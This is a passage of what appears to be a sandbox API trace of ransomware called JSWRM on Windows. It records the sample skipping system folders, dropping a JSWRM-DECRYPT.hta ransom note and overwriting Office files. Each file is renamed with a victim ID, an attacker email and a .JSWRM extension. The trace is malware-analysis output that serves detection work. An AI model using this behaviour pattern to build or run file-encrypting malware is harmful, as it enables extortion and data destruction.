Size=0x20) returned 0x241268 [0137.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONBttnWD.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONBttnWD.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONBttnWD.dll", lpUsedDefaultChar=0x0) returned 12 [0137.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0137.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0137.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONBttnWD.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONBttnWD.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONBttnWD.dll", lpUsedDefaultChar=0x0) returned 12 [0137.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0137.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0137.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0137.604] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1c8ab024, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c8ab024, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OneNote", cAlternateFileName="")) returned 1 [0137.604] lstrcmpiW (lpString1="OneNote", lpString2=".") returned 1 [0137.604] lstrcmpiW (lpString1="OneNote", lpString2="..") returned 1 [0137.604] lstrcmpiW (lpString1="OneNote", lpString2="...") returned 1 [0137.604] lstrcmpiW (lpString1="OneNote", lpString2="windows") returned -1 [0137.604] lstrcmpiW (lpString1="OneNote", lpString2="recovery") returned -1 [0137.604] lstrcmpiW (lpString1="OneNote", lpString2="perflogs") returned -1 [0137.604] lstrcmpiW (lpString1="OneNote", lpString2="documents and settings") returned 1 [0137.604] lstrcmpiW (lpString1="OneNote", lpString2="$RECYCLE.BIN") returned 1 [0137.604] lstrcmpiW (lpString1="OneNote", lpString2="system volume information") returned -1 [0137.604] lstrcmpiW (lpString1="OneNote", lpString2="msocache") returned 1 [0137.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0137.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217eb0 [0137.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0137.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0137.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0137.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0137.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24bf38 [0137.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0137.604] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\jswrm-decrypt.hta")) returned 0xffffffff [0137.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0137.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0137.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x27b348 [0137.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0137.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x27d118 [0137.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0137.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0137.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b768 [0137.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0137.606] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0137.606] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.606] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0137.607] CloseHandle (hObject=0x45c) returned 1 [0137.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0137.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27d118 | out: hHeap=0x1e0000) returned 1 [0137.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0137.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0137.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0137.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0137.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0137.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b768 [0137.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0137.608] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\jswrm-decrypt.hta")) returned 0x20 [0137.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0137.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0137.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0137.608] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1c8ab024, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x48ae1f9c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1418, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231f80 [0137.608] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0137.608] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1c8ab024, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x48ae1f9c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1418, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0137.608] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0137.608] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0137.608] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48ae1f9c, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x48ae1f9c, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x48ae1f9c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xf1418, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0137.608] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0137.608] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0137.608] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0137.608] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0137.608] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0137.608] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0137.608] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0137.608] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0137.608] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0137.608] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0137.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0137.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0137.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0137.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0137.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0137.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0137.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0137.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0137.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0137.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0137.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0137.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0137.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0137.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0137.609] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c884dc0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c884dc0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c884dc0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x572, dwReserved0=0xf1418, dwReserved1=0x0, cFileName="prnms006.inf", cAlternateFileName="")) returned 1 [0137.609] lstrcmpiW (lpString1="prnms006.inf", lpString2=".") returned 1 [0137.609] lstrcmpiW (lpString1="prnms006.inf", lpString2="..") returned 1 [0137.609] lstrcmpiW (lpString1="prnms006.inf", lpString2="...") returned 1 [0137.609] lstrcmpiW (lpString1="prnms006.inf", lpString2="windows") returned -1 [0137.609] lstrcmpiW (lpString1="prnms006.inf", lpString2="recovery") returned -1 [0137.609] lstrcmpiW (lpString1="prnms006.inf", lpString2="perflogs") returned 1 [0137.609] lstrcmpiW (lpString1="prnms006.inf", lpString2="documents and settings") returned 1 [0137.609] lstrcmpiW (lpString1="prnms006.inf", lpString2="$RECYCLE.BIN") returned 1 [0137.609] lstrcmpiW (lpString1="prnms006.inf", lpString2="system volume information") returned -1 [0137.609] lstrcmpiW (lpString1="prnms006.inf", lpString2="msocache") returned 1 [0137.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0137.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prnms006.inf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prnms006.inf", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="prnms006.inf", lpUsedDefaultChar=0x0) returned 12 [0137.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0137.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0137.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prnms006.inf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prnms006.inf", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="prnms006.inf", lpUsedDefaultChar=0x0) returned 12 [0137.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0137.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0137.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0137.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0137.610] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\prnms006.inf" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\prnms006.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.612] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1394) returned 1 [0137.612] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x570) returned 0x2332c0 [0137.612] ReadFile (in: hFile=0x238, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x570, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x570, lpOverlapped=0x0) returned 1 [0137.613] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.613] WriteFile (in: hFile=0x238, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x570, lpOverlapped=0x0) returned 1 [0137.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0137.614] CloseHandle (hObject=0x238) returned 1 [0137.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0137.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0137.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0137.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0137.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0137.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0137.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0137.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0137.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0137.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0137.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0137.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0137.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0137.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0137.614] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\prnms006.inf" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\prnms006.inf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\prnms006.inf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\prnms006.inf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0137.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0137.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0137.615] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c884dc0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c884dc0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c884dc0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e56, dwReserved0=0xf1418, dwReserved1=0x0, cFileName="prnSendToOneNote.cat", cAlternateFileName="PRNSEN~2.CAT")) returned 1 [0137.615] lstrcmpiW (lpString1="prnSendToOneNote.cat", lpString2=".") returned 1 [0137.615] lstrcmpiW (lpString1="prnSendToOneNote.cat", lpString2="..") returned 1 [0137.615] lstrcmpiW (lpString1="prnSendToOneNote.cat", lpString2="...") returned 1 [0137.615] lstrcmpiW (lpString1="prnSendToOneNote.cat", lpString2="windows") returned -1 [0137.615] lstrcmpiW (lpString1="prnSendToOneNote.cat", lpString2="recovery") returned -1 [0137.615] lstrcmpiW (lpString1="prnSendToOneNote.cat", lpString2="perflogs") returned 1 [0137.615] lstrcmpiW (lpString1="prnSendToOneNote.cat", lpString2="documents and settings") returned 1 [0137.615] lstrcmpiW (lpString1="prnSendToOneNote.cat", lpString2="$RECYCLE.BIN") returned 1 [0137.615] lstrcmpiW (lpString1="prnSendToOneNote.cat", lpString2="system volume information") returned -1 [0137.616] lstrcmpiW (lpString1="prnSendToOneNote.cat", lpString2="msocache") returned 1 [0137.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0137.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prnSendToOneNote.cat", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0137.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0137.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prnSendToOneNote.cat", cchWideChar=20, lpMultiByteStr=0x2410d8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="prnSendToOneNote.cat", lpUsedDefaultChar=0x0) returned 20 [0137.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0137.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0137.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prnSendToOneNote.cat", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0137.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0137.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prnSendToOneNote.cat", cchWideChar=20, lpMultiByteStr=0x2411f0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="prnSendToOneNote.cat", lpUsedDefaultChar=0x0) returned 20 [0137.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0137.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0137.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0137.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0137.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\prnSendToOneNote.cat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\prnsendtoonenote.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.617] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11862) returned 1 [0137.617] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2e50) returned 0x27b348 [0137.617] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2e50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2e50, lpOverlapped=0x0) returned 1 [0137.619] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.619] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, 